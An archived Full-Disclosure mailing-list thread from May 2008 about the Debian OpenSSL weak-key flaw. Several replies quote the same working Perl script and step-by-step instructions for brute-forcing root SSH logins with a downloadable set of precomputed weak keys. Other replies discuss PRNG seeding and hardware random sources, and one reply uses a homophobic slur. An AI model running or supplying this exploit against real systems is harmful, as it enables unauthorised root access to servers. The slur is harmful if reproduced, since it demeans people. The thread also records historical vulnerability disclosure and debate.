Re: [Full-disclosure] Working exploit for Debian generated SSH Keys
Salut, Michael, On Tue, 20 May 2008 13:41:41 -0400, Michael Holstein wrote: Smoke Detector + Webcam = cheapo RNG We were talking about PRNGs here, which are highly complex mathematical constructs, not hardware RNGs, which are also slightly hairy though. There are a couple of books on PRNG design, and even if you read them you probably still need a couple of years to design a secure PRNG. I know some highly secure operations (eg: web casinos, using Geiger counters and background radiation) use a version of this for their RNGs, and random.org does it with RF (radios listening to static) .. do patches exist for OpenSSL to use hardware devices? (short of a hack to take something like the above and pipe it to /dev/random, etc). OpenSSL would probably be slightly the wrong place to do this. The BSD systems tend to have kernel drivers for various hardware random sources, XORing them into each other to eliminate the problem with weak random sources. You can then distill this through the /dev/random device. OpenSSL needs a build flag to make use of this additional random material then, I think they add a certain amount of random material to their MD on each iteration. Please note that even hardware random sources are of quite varying quality. Like you said, a Geiger counter provides you with quite high-quality random numbers since, to our knowledge, quantum effects are rather hard to predict. You can also use hard disk seek times as a RNG source, but the quality is rather poor in this case, and you should only use it in addition to other sources. Tonnerre -- SyGroup GmbH Tonnerre Lombard Solutions Systematiques Tel:+41 61 333 80 33Güterstrasse 86 Fax:+41 61 383 14 674053 Basel Web:www.sygroup.ch [EMAIL PROTECTED] signature.asc Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Working exploit for Debian generated SSH Keys
Salut, Garrett, On Mon, 19 May 2008 13:51:29 -0400, Garrett M. Groff wrote: Generating pseudo-random numbers isn't hard given a good API, but writing that API is non-trivial (assuming you want high entropy/low predictability). And, apparently, screwing up that API is also very easy. Generating real pseudo-random streams is a hard problem which is way more than what people can handle. Usually, PRNGs are composed of various periodic elements which, in the end, all combined produce a repeating stream of pseudo-random numbers. OpenSSL uses a modified MAC for this as a state machine and extracts some state bits as random stream on every access. We're not debating the PRNG itself here but the _seed_. OpenSSL supports various ways to influence the state of the PRNG at various stages by XORing in new material; however, Debian chose to only support pre-seeding with uninitialized memory and the Process ID. With the elimination of the uninitialized memory as seed, the seed for the MAC was entirely comprised by the PID. So we're not debating a weakness in the PRNG here at all, which is a _very_ delicate subject. Tonnerre -- SyGroup GmbH Tonnerre Lombard Solutions Systematiques Tel:+41 61 333 80 33Güterstrasse 86 Fax:+41 61 383 14 674053 Basel Web:www.sygroup.ch [EMAIL PROTECTED] signature.asc Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Working exploit for Debian generated SSH Keys
On Mon, 19 May 2008 13:51:29 EDT, Garrett M. Groff said: Generating pseudo-random numbers isn't hard given a good API, but writing that API is non-trivial (assuming you want high entropy/low predictability). And, apparently, screwing up that API is also very easy. Of course, if you're trying to write a PoC, you don't need to know how to code the API - all you need to do is grab the source for the key-tester that got shipped as part of the OpenSSH patch and snarf out the nicely enumerated list of all vulnerable keys, and use that list as the brute-forcer, 6 per connection attempt. ;) pgpehvZRwkLWB.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Working exploit for Debian generated SSH Keys
Generating real pseudo-random streams is a hard problem which is way more than what people can handle. Usually, PRNGs are composed of various periodic elements which, in the end, all combined produce a repeating stream of pseudo-random numbers. OpenSSL uses a modified MAC for this as a state machine and extracts some state bits as random stream on every access. Smoke Detector + Webcam = cheapo RNG http://inventgeek.com/Projects/alpharad/overview.aspx I know some highly secure operations (eg: web casinos, using Geiger counters and background radiation) use a version of this for their RNGs, and random.org does it with RF (radios listening to static) .. do patches exist for OpenSSL to use hardware devices? (short of a hack to take something like the above and pipe it to /dev/random, etc). Cheers, Michael Holstein Cleveland State University ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Working exploit for Debian generated SSH Keys
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Yep, agreed. - - G Salut, Garrett, On Mon, 19 May 2008 13:51:29 -0400, Garrett M. Groff wrote: Generating pseudo-random numbers isn't hard given a good API, but writing that API is non-trivial (assuming you want high entropy/low predictability). And, apparently, screwing up that API is also very easy. Generating real pseudo-random streams is a hard problem which is way more than what people can handle. Usually, PRNGs are composed of various periodic elements which, in the end, all combined produce a repeating stream of pseudo-random numbers. OpenSSL uses a modified MAC for this as a state machine and extracts some state bits as random stream on every access. We're not debating the PRNG itself here but the _seed_. OpenSSL supports various ways to influence the state of the PRNG at various stages by XORing in new material; however, Debian chose to only support pre-seeding with uninitialized memory and the Process ID. With the elimination of the uninitialized memory as seed, the seed for the MAC was entirely comprised by the PID. So we're not debating a weakness in the PRNG here at all, which is a _very_ delicate subject. Tonnerre - -- SyGroup GmbH Tonnerre Lombard Solutions Systematiques Tel:+41 61 333 80 33 Güterstrasse 86 Fax:+41 61 383 14 67 4053 Basel Web:www.sygroup.ch [EMAIL PROTECTED] -BEGIN PGP SIGNATURE- Version: PGP Desktop 9.6.2 (Build 2014) - not licensed for commercial use: www.pgp.com wj8DBQFIMsjuSGIRT5oVahwRAlLrAJ9O7/osiw1tbwq7tjWPV0jjn/53dQCgwjik IZ7FHvEZJsdKXiRkRvE5uN4= =/qAR -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Working exploit for Debian generated SSH Keys
Why reinvent the wheel? On Mon, May 19, 2008 at 6:20 AM, reepex [EMAIL PROTECTED] wrote: why don't you code it yourself instead of being a script kiddie faggot. and don't use ;-) to look cool when you beg for warez. On Sun, May 18, 2008 at 10:13 AM, bob harley [EMAIL PROTECTED] wrote: Anyone have a copy of rsa.2048.tar.bzip2? The web server isn't playing nicely ;-) On Thu, May 15, 2008 at 2:35 AM, Markus Müller [EMAIL PROTECTED] wrote: Hi full-disclosure, the debian openssl issue leads that there are only 65.536 possible ssh keys generated, cause the only entropy is the pid of the process generating the key. This leads to that the following perl script can be used with the precalculated ssh keys to brute force the ssh login. It works if such a keys is installed on a non-patched debian or any other system manual configured to. On an unpatched system, which doesn't need to be debian, do the following: 1. Download http://www.deadbeef.de/rsa.2048.tar.bzip2 2. Extract it to a directory 3. Enter into the /root/.ssh/authorized_keys a SSH RSA key with 2048 Bits, generated on an upatched debian (this is the key this exploit will break) 4. Run the perl script and give it the location to where you extracted the bzip2 mentioned. #!/usr/bin/perl my $keysPerConnect = 6; unless ($ARGV[1]) { print Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n; print Example: ./exploiter.pl /root/keys/ 127.0.0.1\n; print By [EMAIL PROTECTED]; exit 0; } chdir($ARGV[0]); opendir(A, $ARGV[0]) || die(opendir); while ($_ = readdir(A)) { chomp; next unless m,^\d+$,; push(@a, $_); if (scalar(@a) $keysPerConnect) { system(echo .join( , @a).; ssh -l root .join( , map { -i .$_ } @a). .$ARGV[1]); @a = (); } } 5. Enjoy the shell after some minutes (less than 20 minutes) Regards, Markus Mueller [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Ronald van der Westen ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Working exploit for Debian generated SSH Keys
On Mon, 19 May 2008, Ronald van der Westen wrote: Why reinvent the wheel? Why not ? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Working exploit for Debian generated SSH Keys
Anyone have a copy of rsa.2048.tar.bzip2http://www.deadbeef.de/rsa.2048.tar.bzip2? The web server isn't playing nicely ;-) On Thu, May 15, 2008 at 2:35 AM, Markus Müller [EMAIL PROTECTED] wrote: Hi full-disclosure, the debian openssl issue leads that there are only 65.536 possible ssh keys generated, cause the only entropy is the pid of the process generating the key. This leads to that the following perl script can be used with the precalculated ssh keys to brute force the ssh login. It works if such a keys is installed on a non-patched debian or any other system manual configured to. On an unpatched system, which doesn't need to be debian, do the following: 1. Download http://www.deadbeef.de/rsa.2048.tar.bzip2 2. Extract it to a directory 3. Enter into the /root/.ssh/authorized_keys a SSH RSA key with 2048 Bits, generated on an upatched debian (this is the key this exploit will break) 4. Run the perl script and give it the location to where you extracted the bzip2 mentioned. #!/usr/bin/perl my $keysPerConnect = 6; unless ($ARGV[1]) { print Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n; print Example: ./exploiter.pl /root/keys/ 127.0.0.1\n; print By [EMAIL PROTECTED]; exit 0; } chdir($ARGV[0]); opendir(A, $ARGV[0]) || die(opendir); while ($_ = readdir(A)) { chomp; next unless m,^\d+$,; push(@a, $_); if (scalar(@a) $keysPerConnect) { system(echo .join( , @a).; ssh -l root .join( , map { -i .$_ } @a). .$ARGV[1]); @a = (); } } 5. Enjoy the shell after some minutes (less than 20 minutes) Regards, Markus Mueller [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Working exploit for Debian generated SSH Keys
Yes Fredrick Diggle will get you a copy :) On Sun, May 18, 2008 at 10:13 AM, bob harley [EMAIL PROTECTED] wrote: Anyone have a copy of rsa.2048.tar.bzip2? The web server isn't playing nicely ;-) On Thu, May 15, 2008 at 2:35 AM, Markus Müller [EMAIL PROTECTED] wrote: Hi full-disclosure, the debian openssl issue leads that there are only 65.536 possible ssh keys generated, cause the only entropy is the pid of the process generating the key. This leads to that the following perl script can be used with the precalculated ssh keys to brute force the ssh login. It works if such a keys is installed on a non-patched debian or any other system manual configured to. On an unpatched system, which doesn't need to be debian, do the following: 1. Download http://www.deadbeef.de/rsa.2048.tar.bzip2 2. Extract it to a directory 3. Enter into the /root/.ssh/authorized_keys a SSH RSA key with 2048 Bits, generated on an upatched debian (this is the key this exploit will break) 4. Run the perl script and give it the location to where you extracted the bzip2 mentioned. #!/usr/bin/perl my $keysPerConnect = 6; unless ($ARGV[1]) { print Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n; print Example: ./exploiter.pl /root/keys/ 127.0.0.1\n; print By [EMAIL PROTECTED]; exit 0; } chdir($ARGV[0]); opendir(A, $ARGV[0]) || die(opendir); while ($_ = readdir(A)) { chomp; next unless m,^\d+$,; push(@a, $_); if (scalar(@a) $keysPerConnect) { system(echo .join( , @a).; ssh -l root .join( , map { -i .$_ } @a). .$ARGV[1]); @a = (); } } 5. Enjoy the shell after some minutes (less than 20 minutes) Regards, Markus Mueller [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Working exploit for Debian generated SSH Keys
why don't you code it yourself instead of being a script kiddie faggot. and don't use ;-) to look cool when you beg for warez. On Sun, May 18, 2008 at 10:13 AM, bob harley [EMAIL PROTECTED] wrote: Anyone have a copy of rsa.2048.tar.bzip2http://www.deadbeef.de/rsa.2048.tar.bzip2? The web server isn't playing nicely ;-) On Thu, May 15, 2008 at 2:35 AM, Markus Müller [EMAIL PROTECTED] wrote: Hi full-disclosure, the debian openssl issue leads that there are only 65.536 possible ssh keys generated, cause the only entropy is the pid of the process generating the key. This leads to that the following perl script can be used with the precalculated ssh keys to brute force the ssh login. It works if such a keys is installed on a non-patched debian or any other system manual configured to. On an unpatched system, which doesn't need to be debian, do the following: 1. Download http://www.deadbeef.de/rsa.2048.tar.bzip2 2. Extract it to a directory 3. Enter into the /root/.ssh/authorized_keys a SSH RSA key with 2048 Bits, generated on an upatched debian (this is the key this exploit will break) 4. Run the perl script and give it the location to where you extracted the bzip2 mentioned. #!/usr/bin/perl my $keysPerConnect = 6; unless ($ARGV[1]) { print Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n; print Example: ./exploiter.pl /root/keys/ 127.0.0.1\n; print By [EMAIL PROTECTED]; exit 0; } chdir($ARGV[0]); opendir(A, $ARGV[0]) || die(opendir); while ($_ = readdir(A)) { chomp; next unless m,^\d+$,; push(@a, $_); if (scalar(@a) $keysPerConnect) { system(echo .join( , @a).; ssh -l root .join( , map { -i .$_ } @a). .$ARGV[1]); @a = (); } } 5. Enjoy the shell after some minutes (less than 20 minutes) Regards, Markus Mueller [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Working exploit for Debian generated SSH Keys
Could you never write perl again please? Perl underground should take a shot at your stuff but you are not worth it. On Thu, May 15, 2008 at 1:35 AM, Markus Müller [EMAIL PROTECTED] wrote: Hi full-disclosure, the debian openssl issue leads that there are only 65.536 possible ssh keys generated, cause the only entropy is the pid of the process generating the key. This leads to that the following perl script can be used with the precalculated ssh keys to brute force the ssh login. It works if such a keys is installed on a non-patched debian or any other system manual configured to. On an unpatched system, which doesn't need to be debian, do the following: 1. Download http://www.deadbeef.de/rsa.2048.tar.bzip2 2. Extract it to a directory 3. Enter into the /root/.ssh/authorized_keys a SSH RSA key with 2048 Bits, generated on an upatched debian (this is the key this exploit will break) 4. Run the perl script and give it the location to where you extracted the bzip2 mentioned. #!/usr/bin/perl my $keysPerConnect = 6; unless ($ARGV[1]) { print Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n; print Example: ./exploiter.pl /root/keys/ 127.0.0.1\n; print By [EMAIL PROTECTED]; exit 0; } chdir($ARGV[0]); opendir(A, $ARGV[0]) || die(opendir); while ($_ = readdir(A)) { chomp; next unless m,^\d+$,; push(@a, $_); if (scalar(@a) $keysPerConnect) { system(echo .join( , @a).; ssh -l root .join( , map { -i .$_ } @a). .$ARGV[1]); @a = (); } } 5. Enjoy the shell after some minutes (less than 20 minutes) Regards, Markus Mueller [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/